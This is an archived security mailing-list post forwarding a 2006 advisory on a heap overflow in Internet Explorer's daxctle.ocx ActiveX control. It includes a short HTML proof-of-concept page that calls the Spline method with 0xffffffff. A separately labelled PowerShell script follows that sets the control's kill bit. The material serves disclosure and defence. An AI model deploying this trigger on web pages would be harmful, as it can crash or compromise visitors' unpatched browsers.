Security-Alerts mailing list archive (security-alerts@yandex-team.ru)


[security-alerts] FW: [NT] Microsoft Internet Explorer daxctle.ocx Heap Overflow



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Tuesday, August 29, 2006 7:06 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Microsoft Internet Explorer daxctle.ocx Heap Overflow
> 
> 
> 
> Microsoft Internet Explorer daxctle.ocx Heap Overflow 
> 
> 
> 
> Microsoft Internet Explorer is vulnerable to a heap overflow 
> attack when it handles a DirectAnimation.PathControl COM object. 
> 
> 
> Vulnerable Systems: 
>  * Windows 2000/XP/2003 Internet Explorer 6.0 SP1 
> 
> When Internet Explorer handles the DirectAnimation.PathControl COM 
> object (daxctle.ocx) Spline method, setting the first parameter 
> to 0xffffffff triggers an invalid memory write, so that 
> an attacker may DoS and possibly could execute arbitrary code. 
> 
> Exploit: 
> <!-- 
> // Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability 
> // tested on Windows 2000 SP4/XP SP2/2003 SP1 
> 
> // http://www.xsec.org 
> // nop (nop#xsec.org) 
> 
> // CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6} 
> // Info: Microsoft DirectAnimation Path 
> // ProgID: DirectAnimation.PathControl 
> // InprocServer32: C:\WINNT\system32\daxctle.ocx 
> 
> --!> 
> <html> 
> <head> 
> <title>test</title> 
> </head> 
> <body> 
> <script> 
> 
> var target = new ActiveXObject("DirectAnimation.PathControl"); 
> 
> target.Spline(0xffffffff, 1); 
> 
> </script> 
> </body> 
> </html> 
> 
> 
> Additional Information: 
> The information has been provided by nop <mailto:nop@xxxxxxxx> . 
> The original article can be found at: 
> http://www.xsec.org/index.php?module=releases&act=view&type=1&id=19 
> 
> 
> ==============================================================
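
A defender-side check for the control named in the advisory above, added here as an example that is not part of the forwarded message or of SecuriTeam's or xsec's text: it audits, and with `-Set` applies, the Internet Explorer ActiveX kill bit for the CLSID the advisory lists. The kill-bit registry location and the 0x400 flag are the standard Windows mechanism and are not mentioned in the advisory; the function name `Get-KillBitState` is hypothetical.

```powershell
# Added example: audit (and with -Set, apply) the IE ActiveX kill bit for the
# control in the advisory. Run from an elevated 64-bit PowerShell when using -Set.
param([switch]$Set)

$Clsid   = '{D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}'  # CLSID quoted in the advisory
$KillBit = 0x400                                     # flag: IE must not instantiate
$Name    = 'Compatibility Flags'

# 32-bit IE on 64-bit Windows reads the Wow6432Node view, so both are checked.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
) | Where-Object { Test-Path -LiteralPath (Split-Path $_ -Parent) }

function Get-KillBitState {
    param([string]$Root)
    $key   = "$Root\$Clsid"
    $flags = [int64]0
    if (Test-Path -LiteralPath $key) {
        $prop = Get-ItemProperty -LiteralPath $key -Name $Name -ErrorAction SilentlyContinue
        if ($null -ne $prop) { $flags = [int64]$prop.$Name }
    }
    [pscustomobject]@{
        Key     = $key
        Flags   = $flags
        Blocked = (($flags -band $KillBit) -ne 0)
    }
}

foreach ($root in $Roots) {
    $state = Get-KillBitState -Root $root
    if ($Set -and -not $state.Blocked) {
        # Create the per-CLSID key if missing, then OR the kill bit into any
        # flags already present so other compatibility settings are preserved.
        if (-not (Test-Path -LiteralPath $state.Key)) {
            New-Item -Path $state.Key -Force | Out-Null
        }
        $newFlags = [int]($state.Flags -bor $KillBit)
        New-ItemProperty -Path $state.Key -Name $Name -PropertyType DWord `
            -Value $newFlags -Force | Out-Null
        $state = Get-KillBitState -Root $root
    }
    '{0}  flags=0x{1:X8}  blocked={2}' -f $state.Key, $state.Flags, $state.Blocked
}
```

The kill bit only stops Internet Explorer from instantiating the control; it does not change daxctle.ocx itself.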




 




Copyright © Lexa Software, 1996-2009.